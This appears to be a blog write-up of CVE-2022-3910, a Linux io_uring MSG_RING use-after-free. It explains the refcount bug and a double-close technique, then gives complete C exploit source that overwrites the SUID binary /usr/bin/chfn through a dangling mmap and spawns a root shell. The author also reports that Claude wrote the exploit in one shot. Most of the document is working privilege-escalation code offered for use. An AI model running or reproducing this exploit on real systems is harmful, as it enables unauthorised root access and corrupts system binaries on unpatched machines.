Linux Kernel CVE-2022-3910 (h0mbre kCTF bug) LPE
Looking for some more easy same-type-reuse bugs to see what AI can slop out I came across CVE-2022-3910 which was exploited by @h0mbre here.
This was another straight forward file based UAF that would allow same-type-reuse as detailed by @_minipli.
Claude one-shotted this as we had the previous file based exploits done + documented in the same session. Though again without notes/steering/direction it would have gone a completely different (unreliable) way.
Details
In io_uring/io_uring.c (kernels 5.18-5.19.x, fixed by commit fc7222c3a9f5):
static int io_msg_ring(struct io_kiocb *req, unsigned int issue_flags)
{
// ... MSG_RING logic ...
done:
__io_req_complete(req, issue_flags, ret, 0);
io_put_file(req->file); // BUG: called even for fixed files!
req->file = NULL;
return 0;
}
io_put_file() calls fput() on req->file. For fixed files (registered via IORING_REGISTER_FILES), the reference is managed by the registration — operations should NOT do additional fput/fget. But MSG_RING calls io_put_file() unconditionally.
Each IORING_OP_MSG_RING on a fixed file = 1 extra fput.
Exploitation (iouring_dc.c)
Refcount arithmetic:
open() → f_count = 1
dup() → f_count = 2
IORING_REGISTER_FILES → f_count = 3 (fget in registration)
IORING_OP_MSG_RING → f_count = 2 (extra fput from bug)
close(victim_fd) → f_count = 1
IORING_UNREGISTER → f_count = 0 → __fput → FREED
dangling_fd (from dup) still in fd table → dangling pointer to freed struct file.
Deferred __fput handling: The IORING_UNREGISTER_FILES path calls fput() which schedules __fput via task_work_add(). The __fput runs when the task returns to userspace (at the next syscall return). The fork() syscall return in the parent processes all pending task_work, so by the time the spawner child starts, the struct file IS freed.
Exploitation Technique: SUID Binary Overwrite (Double-Close)
The Technique (from CVE-2022-22942-dc.c / minipli)
This technique achieves root shell without needing to read /etc/shadow. It overwrites a SUID binary on disk by exploiting the page cache.
Phase 1: First UAF — Temp File Reuse
- Trigger the vulnerability → dangling_fd to freed struct file
- Spray 256 temp files opened O_RDWR → one reuses the freed slot
- Identify the match:
fstat(dangling_fd)returns the temp file’s inode, compare against each temp fd’s inode
Phase 2: Writable mmap
mmap(MAP_SHARED | PROT_WRITE, match_fd, 0)on the matched temp file- Don’t touch the mapping yet — pages are faulted lazily
- Close ALL temp fds — the mmap holds the last
f_countreference
Phase 3: Double-Free
close(dangling_fd)→fput()on the SAME struct file →f_count 1→0→__fput→ struct file FREED AGAIN- The mmap’s
vm_filepointer is now dangling
Phase 4: SUID Reuse
- Open the SUID target (e.g.,
/usr/bin/chfn) O_RDONLY, 256 times - One of these opens reuses the freed struct file slot
- The mmap’s
vm_filenow points to chfn’s struct file vm_file->f_mapping→ chfn’saddress_space→ chfn’s page cache
Phase 5: Overwrite
memcpy(mmap_addr, exploit_binary, size)→ triggers page faults- Page faults resolved via
vm_file->f_mapping→ chfn’s page cache - The write permission was checked at
mmap()time (against the temp file) - The kernel does NOT re-check permissions after the struct file swap
- Our bytes land in chfn’s page cache → chfn is overwritten on disk
Phase 6: Root Shell
execve("/usr/bin/chfn")→ runs our overwritten binary as SUID root- The binary checks
geteuid() == 0→ callssetuid(0); execve("/bin/sh") - Root shell.
Requirements
- Exploit binary must be dynamically linked (smaller than the SUID target)
- SUID target must be larger than the exploit binary
- The exploit binary must check
geteuid()at startup and exec/bin/shif root
iouring_dc.c
/*
* iouring_dc.c — io_uring MSG_RING UAF → root via SUID binary overwrite
*
* Bug: commit fc7222c3a9f5 (5.18-5.19.x)
*
* Double-close technique (from CVE-2022-22942-dc.c / minipli):
* 1. MSG_RING extra fput → free struct file (dangling_fd stale)
* 2. Spray temp files O_RDWR → one reuses freed slot
* 3. Match via stale fd (fcntl + fstat inode compare)
* 4. mmap(MAP_SHARED, PROT_WRITE) on match — lazy, no pages faulted yet
* 5. Close ALL temp fds + close(dangling_fd) → extra fput → struct file freed AGAIN
* 6. Open SUID target O_RDONLY → reuses slot → mmap's vm_file now points to SUID
* 7. memcpy through mmap → page faults go to SUID's page cache → overwrites binary
* 8. exec overwritten SUID → root shell
*
* When executed as the overwritten SUID (euid==0), drops to /bin/sh.
*
* Compile: gcc -O2 -o iouring_dc iouring_dc.c (dynamic! must fit in SUID)
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/sysmacros.h>
#include <stdint.h>
#include <linux/io_uring.h>
#ifndef SYS_io_uring_setup
#define SYS_io_uring_setup 425
#define SYS_io_uring_enter 426
#define SYS_io_uring_register 427
#endif
#ifndef IORING_OP_MSG_RING
#define IORING_OP_MSG_RING 40
#endif
#define SUID_TARGET "/usr/bin/chfn"
#define NUM_SPRAY 256
#define MAX_RETRIES 20
#define TEMP_PREFIX "/var/tmp/.xtmp"
/* ---- io_uring ---- */
struct ring {
int fd;
void *sq_ring;
struct io_uring_sqe *sqes;
uint32_t *sq_head, *sq_tail, *sq_mask, *sq_array;
uint32_t *cq_head, *cq_tail, *cq_mask;
struct io_uring_cqe *cqes;
};
static int ring_setup(struct ring *r, unsigned entries) {
struct io_uring_params p = {};
r->fd = syscall(SYS_io_uring_setup, entries, &p);
if (r->fd < 0) return -1;
size_t sz = p.sq_off.array + p.sq_entries * sizeof(uint32_t);
size_t cq = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);
if (cq > sz) sz = cq;
r->sq_ring = mmap(NULL, sz, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE, r->fd, IORING_OFF_SQ_RING);
r->sqes = mmap(NULL, p.sq_entries * sizeof(struct io_uring_sqe), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_POPULATE, r->fd, IORING_OFF_SQES);
if (r->sq_ring == MAP_FAILED || r->sqes == MAP_FAILED) return -1;
r->sq_head = r->sq_ring + p.sq_off.head; r->sq_tail = r->sq_ring + p.sq_off.tail;
r->sq_mask = r->sq_ring + p.sq_off.ring_mask; r->sq_array = r->sq_ring + p.sq_off.array;
r->cq_head = r->sq_ring + p.cq_off.head; r->cq_tail = r->sq_ring + p.cq_off.tail;
r->cq_mask = r->sq_ring + p.cq_off.ring_mask; r->cqes = r->sq_ring + p.cq_off.cqes;
return 0;
}
static void ring_push(struct ring *r, struct io_uring_sqe *sqe) {
uint32_t t = *r->sq_tail, i = t & *r->sq_mask;
r->sqes[i] = *sqe; r->sq_array[i] = i;
__atomic_store_n(r->sq_tail, t + 1, __ATOMIC_RELEASE);
}
static int ring_enter(struct ring *r, int s, int w) {
return syscall(SYS_io_uring_enter, r->fd, s, w, IORING_ENTER_GETEVENTS, NULL, 0);
}
static void ring_consume(struct ring *r) {
__atomic_store_n(r->cq_head, *r->cq_head + 1, __ATOMIC_RELEASE);
}
static void pin_cpu(int c) {
cpu_set_t s; CPU_ZERO(&s); CPU_SET(c, &s);
sched_setaffinity(0, sizeof(s), &s);
}
/* Map a file read-only and pre-fault all pages */
static void *map_file(const char *path, size_t *len)
{
struct stat sb;
int fd = open(path, O_RDONLY);
if (fd < 0) { perror(path); _exit(1); }
fstat(fd, &sb);
*len = sb.st_size;
void *addr = mmap(NULL, *len, PROT_READ, MAP_SHARED, fd, 0);
if (addr == MAP_FAILED) { perror("mmap"); _exit(1); }
for (size_t i = 0; i < *len; i += 4096) *(volatile char *)(addr + i);
close(fd);
return addr;
}
int main(int argc, char **argv)
{
/* ---- Stage 0: If we ARE the overwritten SUID binary → root shell ---- */
if (!geteuid()) {
setuid(0); setgid(0);
execve("/bin/sh", (char *const []){"/bin/sh", NULL}, NULL);
_exit(1);
}
if (!getuid()) {
fprintf(stderr, "[!] Don't run as root\n"); return 1;
}
setbuf(stdout, NULL);
char *suid_path = argc > 1 ? argv[1] : SUID_TARGET;
printf("=== io_uring MSG_RING UAF → root shell (SUID overwrite) ===\n");
printf("[*] Target: %s\n\n", suid_path);
/* Verify SUID target */
struct stat suid_st;
if (stat(suid_path, &suid_st) != 0 || suid_st.st_uid != 0 ||
!(suid_st.st_mode & 04111)) {
printf("[!] %s not SUID root\n", suid_path); return 1;
}
/* Map exploit binary and SUID target */
size_t prog_size, suid_size;
const void *prog_addr = map_file("/proc/self/exe", &prog_size);
map_file(suid_path, &suid_size);
if (suid_size < prog_size) {
printf("[!] %s (%zu) too small for exploit (%zu)\n",
suid_path, suid_size, prog_size);
return 1;
}
printf("[+] Exploit: %zu bytes, %s: %zu bytes\n", prog_size, suid_path, suid_size);
pin_cpu(0);
/* ---- Phase 1: Trigger UAF via io_uring MSG_RING ---- */
printf("[*] Phase 1: Triggering UAF\n");
/* Pipes first (SLUB isolation) */
int pipes[4][2];
for (int i = 0; i < 4; i++) pipe(pipes[i]);
struct ring ring;
ring_setup(&ring, 8);
int target_fd = open("/tmp/.xdc_target", O_RDWR|O_CREAT|O_TRUNC, 0666);
int dangling_fd = dup(target_fd);
/* f_count = 2 */
int fds[1] = { target_fd };
syscall(SYS_io_uring_register, ring.fd, IORING_REGISTER_FILES, fds, 1);
/* f_count = 3 */
/* MSG_RING extra fput: f_count 3→2 */
struct io_uring_sqe sqe = {};
sqe.opcode = IORING_OP_MSG_RING;
sqe.fd = 0; sqe.flags = IOSQE_FIXED_FILE; sqe.user_data = 1;
ring_push(&ring, &sqe);
ring_enter(&ring, 1, 1);
ring_consume(&ring);
/* close + unregister: f_count 2→1→0 (deferred) */
close(target_fd);
syscall(SYS_io_uring_register, ring.fd, IORING_UNREGISTER_FILES, NULL, 0);
close(ring.fd);
/* Fork helper: triggers parent's deferred __fput → FREED synchronously */
{
pid_t p = fork();
if (p == 0) _exit(0);
waitpid(p, NULL, 0);
}
/* Additional flush */
syscall(SYS_getpid);
usleep(100000);
printf("[+] struct file FREED, dangling_fd=%d\n", dangling_fd);
/* ---- Phase 2+3: Spray temp files + find match (with retry) ---- */
int temp_fds[NUM_SPRAY];
int match_fd = -1;
for (int attempt = 0; attempt < MAX_RETRIES; attempt++) {
if (attempt > 0) {
printf("[*] Retry %d/%d\n", attempt, MAX_RETRIES);
usleep(200000);
}
printf("[*] Phase 2: Spraying %d temp files O_RDWR\n", NUM_SPRAY);
for (int i = 0; i < NUM_SPRAY; i++) {
char path[64];
snprintf(path, sizeof(path), TEMP_PREFIX "_%d", i);
temp_fds[i] = open(path, O_RDWR|O_CREAT|O_TRUNC, 0600);
if (temp_fds[i] < 0) { perror("open temp"); return 1; }
unlink(path);
ftruncate(temp_fds[i], prog_size);
}
printf("[*] Phase 3: Probing stale fd %d\n", dangling_fd);
int flags = fcntl(dangling_fd, F_GETFL);
struct stat stale_sb;
fstat(dangling_fd, &stale_sb);
printf("[*] flags=%#x ino=%lu\n", flags, (unsigned long)stale_sb.st_ino);
if (flags < 0 || (flags & O_ACCMODE) != O_RDWR) {
printf("[-] Not O_RDWR\n");
for (int i = 0; i < NUM_SPRAY; i++) close(temp_fds[i]);
continue;
}
/* Find which temp fd matches the stale fd */
match_fd = -1;
for (int i = 0; i < NUM_SPRAY; i++) {
struct stat sb;
if (fstat(temp_fds[i], &sb) == 0 &&
sb.st_ino == stale_sb.st_ino && sb.st_dev == stale_sb.st_dev) {
match_fd = temp_fds[i];
printf("[+] Match: temp_fds[%d] (fd %d)\n", i, match_fd);
break;
}
}
if (match_fd >= 0) break;
printf("[-] No match (ino=%lu), retrying\n", (unsigned long)stale_sb.st_ino);
for (int i = 0; i < NUM_SPRAY; i++) close(temp_fds[i]);
}
if (match_fd < 0) {
printf("[!] Failed to find match after %d retries\n", MAX_RETRIES);
return 1;
}
/* ---- Phase 4: mmap the matched file (lazy, no faults yet) ---- */
printf("[*] Phase 4: Creating writable mmap (%zu bytes)\n", prog_size);
void *mmap_addr = mmap(NULL, prog_size, PROT_READ|PROT_WRITE,
MAP_SHARED, match_fd, 0);
if (mmap_addr == MAP_FAILED) { perror("mmap"); return 1; }
/* Close ALL temp fds — mmap holds the last f_count reference */
for (int i = 0; i < NUM_SPRAY; i++) close(temp_fds[i]);
/* ---- Phase 5: Double-free ----
* close(dangling_fd) → fput on the SAME struct file again.
* mmap was PROT_WRITE|MAP_SHARED against the temp file.
* After this fput, f_count=0 → __fput → struct file freed AGAIN.
* The mmap's vm_file is now a dangling pointer. */
printf("[*] Phase 5: Double-free via close(dangling_fd)\n");
close(dangling_fd);
usleep(200000); /* RCU grace period */
/* ---- Phase 6: Reallocate with SUID target ---- */
printf("[*] Phase 6: Opening %s O_RDONLY x%d\n", suid_path, NUM_SPRAY);
int suid_fds[NUM_SPRAY];
for (int i = 0; i < NUM_SPRAY; i++) {
suid_fds[i] = open(suid_path, O_RDONLY);
if (suid_fds[i] < 0) { perror("open suid"); return 1; }
}
/* ---- Phase 7: Overwrite SUID via mmap ----
* memcpy triggers page faults → resolved via vm_file->f_mapping
* which now points to the SUID binary's address_space → writes
* land in the SUID's page cache → overwrites the binary on disk. */
printf("[*] Phase 7: Overwriting %s via mmap (%zu bytes)\n", suid_path, prog_size);
memcpy(mmap_addr, prog_addr, prog_size);
for (int i = 0; i < NUM_SPRAY; i++) close(suid_fds[i]);
/* ---- Phase 8: Exec overwritten SUID ---- */
size_t verify_size;
const void *verify = map_file(suid_path, &verify_size);
if (memcmp(verify, prog_addr, prog_size) == 0) {
printf("\n[+] *** %s overwritten successfully! ***\n", suid_path);
printf("[*] Spawning root shell...\n\n");
execve(suid_path, (char *const []){suid_path, NULL}, NULL);
perror("execve");
} else {
printf("[-] Overwrite verification failed\n");
}
/* Ghost to avoid exit crash */
setsid(); close(0); close(1); close(2);
sigset_t set; sigfillset(&set); sigprocmask(SIG_BLOCK, &set, NULL);
for (;;) pause();
return 1;
}